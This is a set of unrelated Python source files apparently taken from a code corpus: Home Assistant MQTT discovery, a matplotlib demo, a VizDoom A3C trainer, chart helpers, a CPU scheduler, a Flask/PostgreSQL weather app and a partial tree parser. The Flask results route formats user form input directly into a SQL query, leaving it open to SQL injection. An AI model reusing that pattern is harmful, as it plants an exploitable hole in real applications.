'command_topic',\n 'curr_temp_t': 'current_temperature_topic',\n 'dev_cla': 'device_class',\n 'fx_cmd_t': 'effect_command_topic',\n 'fx_list': 'effect_list',\n 'fx_stat_t': 'effect_state_topic',\n 'fx_val_tpl': 'effect_value_template',\n 'exp_aft': 'expire_after',\n 'fan_mode_cmd_t': 'fan_mode_command_topic',\n 'fan_mode_stat_tpl': 'fan_mode_state_template',\n 'fan_mode_stat_t': 'fan_mode_state_topic',\n 'frc_upd': 'force_update',\n 'hold_cmd_t': 'hold_command_topic',\n 'hold_stat_tpl': 'hold_state_template',\n 'hold_stat_t': 'hold_state_topic',\n 'ic': 'icon',\n 'init': 'initial',\n 'json_attr': 'json_attributes',\n 'max_temp': 'max_temp',\n 'min_temp': 'min_temp',\n 'mode_cmd_t': 'mode_command_topic',\n 'mode_stat_tpl': 'mode_state_template',\n 'mode_stat_t': 'mode_state_topic',\n 'name': 'name',\n 'on_cmd_type': 'on_command_type',\n 'opt': 'optimistic',\n 'osc_cmd_t': 'oscillation_command_topic',\n 'osc_stat_t': 'oscillation_state_topic',\n 'osc_val_tpl': 'oscillation_value_template',\n 'pl_arm_away': 'payload_arm_away',\n 'pl_arm_home': 'payload_arm_home',\n 'pl_avail': 'payload_available',\n 'pl_cls': 'payload_close',\n 'pl_disarm': 'payload_disarm',\n 'pl_hi_spd': 'payload_high_speed',\n 'pl_lock': 'payload_lock',\n 'pl_lo_spd': 'payload_low_speed',\n 'pl_med_spd': 'payload_medium_speed',\n 'pl_not_avail': 'payload_not_available',\n 'pl_off': 'payload_off',\n 'pl_on': 'payload_on',\n 'pl_open': 'payload_open',\n 'pl_osc_off': 'payload_oscillation_off',\n 'pl_osc_on': 'payload_oscillation_on',\n 'pl_stop': 'payload_stop',\n 'pl_unlk': 'payload_unlock',\n 'pow_cmd_t': 'power_command_topic',\n 'ret': 'retain',\n 'rgb_cmd_tpl': 'rgb_command_template',\n 'rgb_cmd_t': 'rgb_command_topic',\n 'rgb_stat_t': 'rgb_state_topic',\n 'rgb_val_tpl': 'rgb_value_template',\n 'send_if_off': 'send_if_off',\n 'set_pos_tpl': 'set_position_template',\n 'set_pos_t': 'set_position_topic',\n 'spd_cmd_t': 'speed_command_topic',\n 'spd_stat_t': 'speed_state_topic',\n 'spd_val_tpl': 'speed_value_template',\n 'spds': 'speeds',\n 'stat_clsd': 'state_closed',\n 'stat_off': 'state_off',\n 'stat_on': 'state_on',\n 'stat_open': 'state_open',\n 
'stat_t': 'state_topic',\n 'stat_val_tpl': 'state_value_template',\n 'swing_mode_cmd_t': 'swing_mode_command_topic',\n 'swing_mode_stat_tpl': 'swing_mode_state_template',\n 'swing_mode_stat_t': 'swing_mode_state_topic',\n 'temp_cmd_t': 'temperature_command_topic',\n 'temp_stat_tpl': 'temperature_state_template',\n 'temp_stat_t': 'temperature_state_topic',\n 'tilt_clsd_val': 'tilt_closed_value',\n 'tilt_cmd_t': 'tilt_command_topic',\n 'tilt_inv_stat': 'tilt_invert_state',\n 'tilt_max': 'tilt_max',\n 'tilt_min': 'tilt_min',\n 'tilt_opnd_val': 'tilt_opened_value',\n 'tilt_status_opt': 'tilt_status_optimistic',\n 'tilt_status_t': 'tilt_status_topic',\n 't': 'topic',\n 'uniq_id': 'unique_id',\n 'unit_of_meas': 'unit_of_measurement',\n 'val_tpl': 'value_template',\n 'whit_val_cmd_t': 'white_value_command_topic',\n 'whit_val_stat_t': 'white_value_state_topic',\n 'whit_val_tpl': 'white_value_template',\n 'xy_cmd_t': 'xy_command_topic',\n 'xy_stat_t': 'xy_state_topic',\n 'xy_val_tpl': 'xy_value_template',\n}\n\n\nasync def async_start(hass: HomeAssistantType, discovery_topic, hass_config,\n config_entry=None) -> bool:\n \"\"\"Initialize of MQTT Discovery.\"\"\"\n async def async_device_message_received(topic, payload, qos):\n \"\"\"Process the received message.\"\"\"\n match = TOPIC_MATCHER.match(topic)\n\n if not match:\n return\n\n _prefix_topic, component, node_id, object_id = match.groups()\n\n if component not in SUPPORTED_COMPONENTS:\n _LOGGER.warning(\"Component %s is not supported\", component)\n return\n\n if payload:\n try:\n payload = json.loads(payload)\n except ValueError:\n _LOGGER.warning(\"Unable to parse JSON %s: '%s'\",\n object_id, payload)\n return\n\n payload = dict(payload)\n\n for key in list(payload.keys()):\n abbreviated_key = key\n key = ABBREVIATIONS.get(key, key)\n payload[key] = payload.pop(abbreviated_key)\n\n if TOPIC_BASE in payload:\n base = payload[TOPIC_BASE]\n for key, value in payload.items():\n if isinstance(value, str):\n if value[0] == TOPIC_BASE and key.endswith('_topic'):\n payload[key] = \"{}{}\".format(base, value[1:])\n if value[-1] == TOPIC_BASE and key.endswith('_topic'):\n payload[key] = \"{}{}\".format(value[:-1], base)\n\n # If present, the node_id will be included in the discovered object id\n discovery_id = ' '.join((node_id, object_id)) if node_id else object_id\n discovery_hash = (component, discovery_id)\n\n if payload:\n if CONF_PLATFORM in payload:\n platform = payload[CONF_PLATFORM]\n if platform in DEPRECATED_PLATFORM_TO_SCHEMA:\n schema = DEPRECATED_PLATFORM_TO_SCHEMA[platform]\n payload['schema'] = schema\n _LOGGER.warning('\"platform\": \"%s\" is deprecated, '\n 'replace with \"schema\":\"%s\"',\n platform, schema)\n payload[CONF_PLATFORM] = 'mqtt'\n\n if CONF_STATE_TOPIC not in payload:\n payload[CONF_STATE_TOPIC] = '{}/{}/{}{}/state'.format(\n discovery_topic, component,\n '%s/' % node_id if node_id else '', object_id)\n\n payload[ATTR_DISCOVERY_HASH] = discovery_hash\n\n if ALREADY_DISCOVERED not in hass.data:\n hass.data[ALREADY_DISCOVERED] = {}\n if discovery_hash in hass.data[ALREADY_DISCOVERED]:\n # Dispatch update\n _LOGGER.info(\n \"Component has already been discovered: %s %s, sending update\",\n component, discovery_id)\n async_dispatcher_send(\n hass, MQTT_DISCOVERY_UPDATED.format(discovery_hash), payload)\n elif payload:\n # Add component\n _LOGGER.info(\"Found new component: %s %s\", component, discovery_id)\n hass.data[ALREADY_DISCOVERED][discovery_hash] = None\n\n if component not in CONFIG_ENTRY_COMPONENTS:\n await 
async_load_platform(\n hass, component, 'mqtt', payload, hass_config)\n return\n\n config_entries_key = '{}.{}'.format(component, 'mqtt')\n async with hass.data[DATA_CONFIG_ENTRY_LOCK]:\n if config_entries_key not in hass.data[CONFIG_ENTRY_IS_SETUP]:\n await hass.config_entries.async_forward_entry_setup(\n config_entry, component)\n hass.data[CONFIG_ENTRY_IS_SETUP].add(config_entries_key)\n\n async_dispatcher_send(hass, MQTT_DISCOVERY_NEW.format(\n component, 'mqtt'), payload)\n\n hass.data[DATA_CONFIG_ENTRY_LOCK] = asyncio.Lock()\n hass.data[CONFIG_ENTRY_IS_SETUP] = set()\n\n await mqtt.async_subscribe(\n hass, discovery_topic + '/#', async_device_message_received, 0)\n\n return True\n","sub_path":"homeassistant/components/mqtt/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":9603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"169324500","text":"import matplotlib.pyplot as plt\n\n# Scatter plots\n#plt.scatter(2,4) # pass x and y coordinates to draw a single point at that position\n\n#plt.scatter(2,4,s=200) # s sets the point size\nplt.show()\n\n# Draw a series of points by passing in lists\n# x_values=[1,2,3,4,5]\n# y_values=[1,4,9,16,25]\n# plt.scatter(x_values,y_values,s=100) # reads one value from each list in turn to draw each point\n# plt.show()\n\n\nx_values=list(range(1,1001))\ny_values=[i**2 for i in x_values]\n# plt.scatter(x_values,y_values,s=40,edgecolor='none',c=(0.1,0.5,0.8)) # drop the outline color; the default is blue points with a black outline. # custom colors are given as a tuple of three decimals between 0 and 1\n# plt.axis([0,1100,0,1100000]) # takes [xmin, xmax, ymin, ymax], the value range of each axis\n# plt.show()\n\n# Colormaps\n# smaller values get lighter colors, larger values get darker colors\nplt.scatter(x_values,y_values,c=y_values,cmap=plt.cm.Blues,edgecolor='none',s=40) # here c is the list of values to map and cmap picks the colormap to use\n#plt.savefig(\"test.png\",bbox_inches=\"tight\") # saves the chart into the current directory automatically. bbox_inches crops the extra blank space around the chart\nplt.show()","sub_path":"graph/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} {"seq_id":"44635941","text":"import itertools\nimport numpy as np\nfrom skimage.transform import resize\nimport time\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom vizdoom import DoomGame, Mode, ScreenFormat, ScreenResolution\n\nfrom viz_utils import set_init, plotter_ep_rew, plotter_ep_rew_norm, handleArguments, push_and_pull, record, plotter_ep_time_norm, plotter_ep_time, confidence_intervall\nimport torch.multiprocessing as mp\nfrom shared_adam import SharedAdam\nimport sys\nimport os\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\n\nUPDATE_GLOBAL_ITER = 5\nGAMMA = 0.9\nMAX_EP = 2000\nframe_repeat = 12\nresolution = (30, 45)\nconfig_file_path = \"VIZDOOM/deadly_corridor.cfg\"\nworker_num = int(mp.cpu_count()) # Number of reincarnations for Agent\n\n\ndef initialize_vizdoom(config):\n game = DoomGame()\n game.load_config(config)\n game.set_window_visible(False)\n game.set_mode(Mode.PLAYER)\n game.set_screen_format(ScreenFormat.GRAY8)\n game.set_screen_resolution(ScreenResolution.RES_640X480)\n game.init()\n return game\n\ndef preprocess(img):\n return torch.from_numpy(resize(img, resolution).astype(np.float32))\n\n\ndef game_state(game):\n return preprocess(game.get_state().screen_buffer)\n\ngame = initialize_vizdoom(config_file_path)\nstatesize = (game_state(game).shape[0])\nstate = game_state(game)\nn = game.get_available_buttons_size()\nactions = [list(a) for a in itertools.product([0, 1], repeat=n)]\n\nprint(\"Current State:\", state, \"\\\\n\")\nprint(\"Statesize:\", statesize, \"\\\\n\")\n\nprint(\"Action 
Size: \", n)\nprint(\"All possible Actions:\", actions, \"\\n\", \"Total: \", len(actions))\nprint(\"Number of used CPUs: \", worker_num)\n\nattack = []\nfor a in range(len(actions)):\n if actions[a][2] == 1:\n attack.append(a)\n\nclass Net(nn.Module):\n def __init__(self, a_dim):\n super(Net, self).__init__()\n self.s_dim = 45\n self.a_dim = a_dim\n self.pi1 = nn.Linear(self.s_dim, 240)\n self.pi2 = nn.Linear(240, 360)\n self.pi3 = nn.Linear(360, a_dim)\n self.v2 = nn.Linear(240, 360)\n self.v3 = nn.Linear(360, 1)\n\n set_init([self.pi1, self.pi2, self.pi3, self.v2, self.v3])\n self.distribution = torch.distributions.Categorical\n\n def forward(self, x):\n pi1 = F.relu(self.pi1(x))\n pi2 = F.relu(self.pi2(pi1))\n logits = self.pi3(pi2)\n v2 = F.relu(self.v2(pi1))\n values = self.v3(v2)\n return logits, values\n\n def set_init(layers):\n for layer in layers:\n nn.init.xavier_uniform_(layer.weight, nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(layer.bias, nn.init.calculate_gain('relu'))\n\n def choose_action(self, s):\n self.eval()\n logits, _ = self.forward(s)\n prob = F.softmax(logits, dim=1).data\n m = self.distribution(prob)\n return m.sample().numpy()[0]\n\n def loss_func(self, s, a, v_t):\n self.train()\n logits, values = self.forward(s)\n\n new_values = torch.zeros([len(v_t), 1], dtype=torch.float32)\n # Reshape Tensor of values\n for i in range(len(v_t)):\n for j in range(30):\n values[i][0] += values[i+j][0]\n new_values[i][0] = values[i][0]\n\n td = v_t - new_values\n c_loss = td.pow(2)\n new_logits = torch.zeros([len(v_t), 128], dtype=torch.float32)\n # Reshape Tensor of logits\n for i in range(len(logits[0])):\n countrow = 0\n for j in range(len(logits)):\n logits[countrow][i] += logits[j][i]\n if j % 30 == 0:\n new_logits[countrow][i] = logits[countrow][i]\n countrow += 1\n probs = F.softmax(new_logits, dim=1)\n m = self.distribution(probs)\n exp_v = m.log_prob(a) * td.detach().squeeze()\n a_loss = -exp_v\n total_loss = (c_loss + a_loss).mean()\n return total_loss\n\n\n\nclass Worker(mp.Process):\n def __init__(self, gnet, opt, global_ep, global_ep_r, global_time_done, res_queue, time_queue, action_queue, name):\n super(Worker, self).__init__()\n self.name = 'w%02i' % name\n self.g_ep, self.g_ep_r, self.g_time = global_ep, global_ep_r, global_time_done\n self.gnet, self.opt = gnet, opt\n self.lnet = Net(len(actions)) # local network\n self.game = initialize_vizdoom(config_file_path)\n self.res_queue, self.time_queue, self.action_queue = res_queue, time_queue, action_queue\n\n def run(self):\n total_step = 1\n\n while self.g_ep.value < MAX_EP:\n self.game.new_episode()\n state = game_state(self.game)\n buffer_s, buffer_a, buffer_r = [], [], []\n ep_r = 0.\n while True:\n start = time.time()\n done = False\n a = self.lnet.choose_action(state)\n if a in attack:\n self.action_queue.put(1)\n else:\n self.action_queue.put(0)\n\n r = self.game.make_action(actions[a], frame_repeat)\n\n if self.game.is_episode_finished():\n done = True\n else:\n s_ = game_state(self.game)\n\n ep_r += r\n buffer_a.append(a)\n buffer_s.append(state)\n buffer_r.append(r)\n\n if done or total_step % UPDATE_GLOBAL_ITER == 0: # update network\n # sync\n push_and_pull(opt, self.lnet, self.gnet, done, s_, buffer_s, buffer_a, buffer_r, GAMMA)\n buffer_s, buffer_a, buffer_r = [], [], []\n\n if done:\n end = time.time()\n time_done = end - start\n record(self.g_ep, self.g_ep_r, ep_r, self.res_queue, self.time_queue, self.g_time, time_done, self.name)\n break\n\n state = s_\n total_step += 1\n\n 
self.time_queue.put(None)\n self.res_queue.put(None)\n self.action_queue.put(None)\n\n\nif __name__ == '__main__':\n\n print (\"Starting A3C Agent for Vizdoom-DeadlyCorridor\")\n time.sleep(3)\n\n timedelta_sum = datetime.now()\n timedelta_sum -= timedelta_sum\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True)\n\n if handleArguments().normalized_plot and not handleArguments().save_data:\n runs = 3\n else:\n runs = 1\n\n for i in range(runs):\n starttime = datetime.now()\n\n # load global network\n if handleArguments().load_model:\n model = Net(len(actions))\n model = torch.load(\"./VIZDOOM/doom_save_model/a3c_doom_comb.pt\")\n model.eval()\n else:\n model = Net(len(actions))\n\n # global optimizer\n opt = SharedAdam(model.parameters(), lr=0.001, betas=(0.92, 0.999))\n global_ep, global_ep_r, global_time_done = mp.Value('i', 0), mp.Value('d', 0.), mp.Value('d', 0.)\n res_queue, time_queue, action_queue = mp.Queue(), mp.Queue(), mp.Queue()\n # parallel training\n if handleArguments().load_model:\n workers = [Worker(model, opt, global_ep, global_ep_r, global_time_done,res_queue, time_queue, action_queue, i) for i in range(1)]\n [w.start() for w in workers]\n else:\n workers = [Worker(model, opt, global_ep, global_ep_r, global_time_done, res_queue, time_queue, action_queue, i) for i in\n range(worker_num)]\n [w.start() for w in workers]\n\n # record episode-reward and duration-episode to plot\n res = []\n durations = []\n action = []\n while True:\n r = res_queue.get()\n t = time_queue.get()\n act = action_queue.get()\n\n if r is None or t is None or act is None:\n break\n\n res.append(r)\n durations.append(t)\n action.append(act)\n\n [w.join() for w in workers]\n\n if handleArguments().load_model:\n print(\"Testing! No need to save model.\")\n else:\n print(\"Save model\")\n torch.save(model, \"./VIZDOOM/doom_save_model/a3c_doom_comb.pt\")\n\n endtime = datetime.now()\n timedelta = endtime - starttime\n print(\"Number of Episodes: \", global_ep.value, \" | Finished within: \", timedelta)\n timedelta_sum += timedelta / 3\n\n # Plot results\n if handleArguments().normalized_plot:\n plotter_ep_time_norm(ax1, durations)\n plotter_ep_rew_norm(ax2, res)\n else:\n plotter_ep_time(ax1, durations)\n plotter_ep_rew(ax2, res)\n\n plt.title(\"A3C-Vizdoom (shared NN)\", fontsize=16)\n\n if handleArguments().save_data:\n if handleArguments().load_model:\n scores = np.asarray([res])\n np.savetxt('VIZDOOM/doom_save_plot_data/a3c_doom_comb_test.csv', scores, delimiter=',')\n else:\n scores = np.asarray([res])\n np.savetxt('VIZDOOM/doom_save_plot_data/a3c_doom_comb.csv', scores, delimiter=',')\n\n # Get results for confidence intervall\n confidence_intervall(action)\n\n font = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 8\n }\n if handleArguments().normalized_plot:\n plt.text(0, 450, f\"Average Training Duration: {timedelta_sum}\", fontdict=font)\n\n plt.show()\n\n game.close()\n sys.exit()\n\n","sub_path":"VIZDOOM/vizdoom_a3c_comb.py","file_name":"vizdoom_a3c_comb.py","file_ext":"py","file_size_in_byte":9541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"253741167","text":"# coding:utf8\nfrom pyecharts import Bar, Pie\n\n\n# 四核CPU折线图\ndef test_graph():\n from pyecharts import Line, Style\n\n style = Style(\n width='100%'\n )\n\n attr, v1, v2, v3, v4 = [], [], [], [], []\n line = Line(\"cpu们\", renderer='svg')\n # ** style.init_style\n line.chart_id = 'cpus'\n line.width = '100%'\n line.add(\"cpu1\", attr, v1, 
is_smooth=\"True\", is_toolbox_show=False)\n line.add(\"cpu2\", attr, v2, is_smooth=\"True\")\n line.add(\"cpu3\", attr, v3, is_smooth=\"True\")\n line.add(\"cpu4\", attr, v4, is_smooth=\"True\")\n return line.render_embed()\n\n\n# Server Status: CPU, Memory, Network\ndef server_status():\n attr = [\"CPU\", \"Memory\", \"Network\"]\n v1 = [0, 0, 0]\n bar = Bar()\n bar.chart_id = \"serverow\"\n bar.width = \"100%\"\n label_color = [\"#a0a7e6\", \"#3fb1e3\", \"#6be6c1\", \"#626c91\", \"#c4ebad\"]\n bar.add(\"Win10\", attr, v1, yaxis_max=100,\n is_stack=True, is_label_show=True,\n bar_category_gap=\"5%\", label_color=label_color)\n return bar.render_embed()\n\n\ndef home_basic(home):\n attr = [\"债务\",\"资产\", \"现金\"]\n v1 = [home.debt, home.asset, home.cash]\n pie = Pie(\"资产概览\")\n pie.id = \"home_basic\"\n pie.width = \"100%\"\n pie.add(\"\",attr,v1,is_label_show=True)\n return pie.render_embed()","sub_path":"app/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407429872","text":"# -*- coding: utf-8 -*-\n\nimport scheduler \nfrom operator import attrgetter\nclass FCFS:\n def __init__(self,inputfile,contextswitching):\n self.readyProcesses = [] #sorted list of all processes in ready state\n self.processes = scheduler.ReadFile(inputfile)\n self.contextSwitching = int(1000*contextswitching)\n self.procNo=[]\n self.startTimes=[]\n self.endTimes=[]\n self.FCFSAlgorithm()\n scheduler.OutputFile(self.processes,self.avgTAT,self.avgWTAT)\n \n \n def GetArrivedProcesses(self,time):\n\n while(self.processes and self.processes[0].arrivalTime <= time):\n self.readyProcesses.append(self.processes[0])\n self.processes.pop(0)\n \n def GetStatsData(self):\n return self.procNo ,self.startTimes,self.endTimes\n \n def FCFSAlgorithm(self):\n currentTime=0\n totalTAT=0\n totalWTAT=0\n executedProcesses= [] #all executed processes\n self.processes.sort() # sorted by arrival time #ID??\n #for i in range (len(self.processes)):\n # print(self.processes[i].arrivalTime)\n #print(len(self.processes))\n running = False # Is there a running process\n while (self.processes or self.readyProcesses or running):\n self.GetArrivedProcesses(currentTime) #check the arrival of new process \n \n if len(self.readyProcesses) == 0 and not running: #no running process or new process arrived\n currentTime+=1\n continue\n \n if not running:\n runningProcess = self.readyProcesses[0]\n running = True\n self.readyProcesses.pop(0) #remove from ready queue\n currentTime += self.contextSwitching #assume there is a full switching time before running fist process\n self.procNo.append(runningProcess.ID)\n self.startTimes.append(currentTime)\n runningProcess.SetTimes(currentTime) #set WT,TAT, WTAT, \n totalTAT+= runningProcess.TAT\n totalWTAT+= runningProcess.WTAT\n \n runningProcess.burstTime -= 1\n currentTime+=1\n if runningProcess.burstTime == 0:\n self.endTimes.append(currentTime) #process finished execusion\n executedProcesses.append(runningProcess)\n running = False\n \n self.processes=executedProcesses\n self.avgTAT= float(totalTAT)/len(self.processes)\n self.avgWTAT= float(totalWTAT)/len(self.processes)\n \n ","sub_path":"fcfs.py","file_name":"fcfs.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"228952814","text":"import sys\nimport os\nimport time\nimport requests\nimport psycopg2\nimport calendar\nfrom 
datetime import datetime\nfrom joblib import Parallel, delayed\nfrom flask import Flask, render_template, request, jsonify\n\ncity_id = requests.get(\"https://www.metaweather.com/api/location/search/?query={}\".format('Moscow')).json()[0]['woeid']\nnum_days = calendar.monthrange(datetime.now().year, datetime.now().month)[1]\ndays = [('{:04}/{:02}/{:02}/'.format(datetime.now().year, datetime.now().month, day)) for day in range(1, num_days + 1)]\ncolumn_names = [\"id\", \"weather_state_name\", \"wind_direction_compass\", \"created\",\n \"applicable_date\", \"min_temp\", \"max_temp\", \"the_temp\"]\n\ndb_params = {\n \"host\": os.getenv('DB_HOST'),\n \"database\": os.getenv('DB_NAME'),\n \"user\": os.getenv('DB_USER'),\n \"password\": os.getenv('DB_PASSWORD'),\n \"port\": \"5432\"\n}\n\ndef get_weather_result(city_id, date):\n url = \"https://www.metaweather.com/api/location/{}/{}\".format(city_id, date)\n weather_result = requests.get(url)\n return weather_result.json()\n\ndef connect(db_params):\n conn = None\n try:\n print('Connecting to the PostgreSQL database...')\n conn = psycopg2.connect(**db_params)\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n sys.exit(1)\n print(\"Connection successful\")\n return conn\n\ndef insert_table():\n try:\n conn = connect(db_params)\n cursor = conn.cursor()\n cursor.execute(\"\"\" CREATE TABLE IF NOT EXISTS forecast (id bigint UNIQUE, weather_state_name varchar(45),\\\n wind_direction_compass varchar(45), created varchar(45), applicable_date varchar(45), min_temp integer,\\\n max_temp integer, the_temp integer); \"\"\")\n for date in days:\n result = get_weather_result(city_id, date)\n for item in result:\n sql = \"\"\" INSERT INTO forecast VALUES (%s,%s,%s,%s,%s,%s,%s,%s) ON CONFLICT (id) DO NOTHING; \"\"\"\n table_data = [item[column] for column in column_names]\n cursor.execute(sql, table_data)\n conn.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Failed inserting record into mobile table {}\".format(error))\n cursor.close()\n conn.close()\n\ndef postgresql_query(conn, select_query):\n cursor = conn.cursor()\n try:\n cursor.execute(select_query)\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n cursor.close()\n return 1\n res = cursor.fetchall()\n cursor.close()\n return res\n\ndef worker(i):\n print('worker ', i)\n x = 0\n while x < 1000:\n print(x)\n x += 1\n\ninsert_table()\n\nlist_of_date = [item[0] for item in postgresql_query(conn=connect(db_params),\n select_query=\"\"\"SELECT DISTINCT(applicable_date)\"\n \" FROM forecast ORDER BY applicable_date;\"\"\")]\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html',list_of_date=list_of_date)\n\n@app.route('/results', methods=['POST','GET'])\ndef results():\n select = request.form.get('date_select')\n conn = connect(db_params)\n sql_query = \"\"\" SELECT * FROM forecast WHERE applicable_date = '{}' ORDER BY created; \"\"\".format(select)\n date_weather = postgresql_query(conn, sql_query)\n conn.close()\n return render_template('results.html', select=select, list_of_date=list_of_date, date_weather=date_weather)\n\n@app.route('/update', methods=['POST','GET'])\ndef update():\n insert_table()\n return render_template('update.html', list_of_date=list_of_date)\n\n@app.route('/stress')\ndef stress():\n start_time = time.time()\n Parallel(n_jobs=-1, prefer=\"processes\", verbose=0)(\n delayed(worker)(num)\n for num in range(12000)\n )\n end_time = time.time() - start_time\n resp = 
jsonify(success=True, time=str(end_time))\n resp.status_code = 200\n return resp\n\nif __name__ == '__main__':\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"627275698","text":"import os\r\nfrom rt import RelationTree\r\n\r\n# ------------------------------------------------------\r\n# ----- creation.py ----\r\n# ------------------------------------------------------\r\n# handle all post-processing duties:\r\n# creates or appends file from dep tree\r\n# ------------------------------------------------------\r\n\r\n\r\nNUM_MAX = 999999\r\nNUM_SIZE = 6\r\nNODE_SIZE = 53\r\nSEEK_NAME = 0\r\nSEEK_ID = 32\r\nSEEK_PID = 38\r\nSEEK_NUM = 44\r\nSEEK_TAG = 50\r\nTAG_SIZE = 3\r\n\r\n# ----------------------\r\n# --- Read from file ---\r\n# ----------------------\r\ndef read_file(fn, pos, size):\r\n with open(fn, 'ab+') as f:\r\n f.seek(pos, 0)\r\n s = str(bytes.decode(f.read(size)))\r\n return s.rstrip(' ')\r\n\r\n# --------------------------\r\n# --- Create/append file ---\r\n# --------------------------\r\ndef create_file(fn, tree):\r\n with open(fn, 'ab+') as f:\r\n f.seek(SEEK_NAME, 1)\r\n f.write(str.encode(str(tree.name)))\r\n f.seek(SEEK_ID, 1)\r\n f.write(str.encode(str(tree.id)))\r\n f.seek(SEEK_PID, 1)\r\n f.write(str.encode(str(tree.parent)))\r\n f.seek(SEEK_NUM, 1)\r\n f.write(str.encode(str(tree.num)))\r\n f.seek(SEEK_TAG, 1)\r\n f.write(str.encode(str(tree.tag)))\r\n f.write(str.encode('\\n'))\r\n\r\n\r\n\r\n# -----------------------------\r\n# --- Overwrite file at pos ---\r\n# -----------------------------\r\ndef write_file(fn, data, pos):\r\n with open(fn, 'r+b') as f:\r\n f.seek(pos, 0)\r\n f.write(str.encode(data))\r\n\r\n# -------------------------\r\n# --- Update root node ---\r\n# -------------------------\r\ndef incrementRoot(fn):\r\n pos = SEEK_NUM\r\n n = str(int(read_file(fn, pos, NUM_SIZE)) + 1)\r\n if n != NUM_MAX:\r\n write_file(fn, n, pos)\r\n\r\n# --------------------------\r\n# --- Parse tree to file ---\r\n# --------------------------\r\ndef tree_parser(tree, fn):\r\n #with lock:\r\n cwd = os.getcwd()\r\n\r\n path = tree.path\r\n name = tree.name\r\n tag = tree.tag\r\n num = str(tree.num)\r\n id = str(tree.id)\r\n parent = str(tree.parent)\r\n\r\n while len(name) < SEEK_ID: name += ' '\r\n while len(tag) < TAG_SIZE: tag += ' '\r\n while len(str(id)) < NUM_SIZE: id += ' '\r\n while len(str(parent)) < NUM_SIZE: parent += ' '\r\n while len(str(num)) < NUM_SIZE: num += ' '\r\n\r\n tree.set_name(name)\r\n tree.set_id(id)\r\n tree.set_parent(parent)\r\n tree.set_num(num)\r\n tree.set_tag(tag)\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n os.chdir(path)\r\n\r\n os.chdir(path)\r\n\r\n if os.path.isfile(fn):\r\n size = os.stat(fn).st_size\r\n infile = False\r\n for i in range(0, size, NODE_SIZE + 1):\r\n res = read_file(fn, i, SEEK_ID)\r\n name = name.rstrip(' ')\r\n p = read_file(fn, i + SEEK_PID, NUM_SIZE)\r\n parent = parent.rstrip(' ')\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 1: Node has same name and parent as\r\n # an existing node in file. 
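# --- Editor's note (sketch; not part of the original record) -----------------
# The Flask app above inserts forecast rows one at a time inside a single
# transaction. The same idempotent-insert idea, condensed with psycopg2's
# executemany and the connection context manager (which commits on success
# and rolls back on error). The helper name is an assumption; the table,
# placeholder count, and ON CONFLICT guard are taken from the record.

def upsert_forecast(conn, rows):
    # rows: iterable of 8-tuples in column_names order
    sql = ("INSERT INTO forecast VALUES (%s,%s,%s,%s,%s,%s,%s,%s) "
           "ON CONFLICT (id) DO NOTHING;")
    with conn, conn.cursor() as cursor:
        cursor.executemany(sql, rows)
# -----------------------------------------------------------------------------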
Increment node.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n if res == name and p == parent:\r\n incrementNode(fn, i)\r\n infile = True\r\n break\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 2: Node has same name but different\r\n # parent than existing node.\r\n # Check the remainder of the file for a match.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n elif res == name and p != parent:\r\n for j in range(i, size, NODE_SIZE + 1):\r\n res1 = read_file(fn, j, SEEK_ID)\r\n p1 = read_file(fn, j + SEEK_PID, NUM_SIZE)\r\n if res1 == name and p1 == parent:\r\n break\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 3: Node does not exist in file.\r\n # Append node.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n if not infile:\r\n appendNode(fn, tree)\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n # Case 4: File does not exist.\r\n # Create file.\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n else:\r\n createNode(fn, tree, path)\r\n\r\n os.chdir(cwd)\r\n\r\n\r\n# -----------------------------------\r\n# --- Append the node to the tree ---\r\n# -----------------------------------\r\ndef appendNode(fn, tree):\r\n incrementRoot(fn)\r\n pos = SEEK_PID\r\n n = str(int(read_file(fn, pos, NUM_SIZE)) + 1)\r\n write_file(fn, n, pos)\r\n if noProblem(fn, tree):\r\n create_file(fn, tree)\r\n\r\n# --------------------------------------\r\n# --- Create root node and first dep ---\r\n# --------------------------------------\r\ndef createNode(fn, tree, path):\r\n rootName = fn[0:len(fn) - 4]\r\n while len(rootName) < SEEK_ID: rootName += ' '\r\n root = RelationTree(rootName, '0 ', '1 ', '1 ', path, ' ')\r\n create_file(fn, root)\r\n create_file(fn, tree)\r\n\r\n# -------------------------------\r\n# --- Increment 'num' in node ---\r\n# -------------------------------\r\ndef 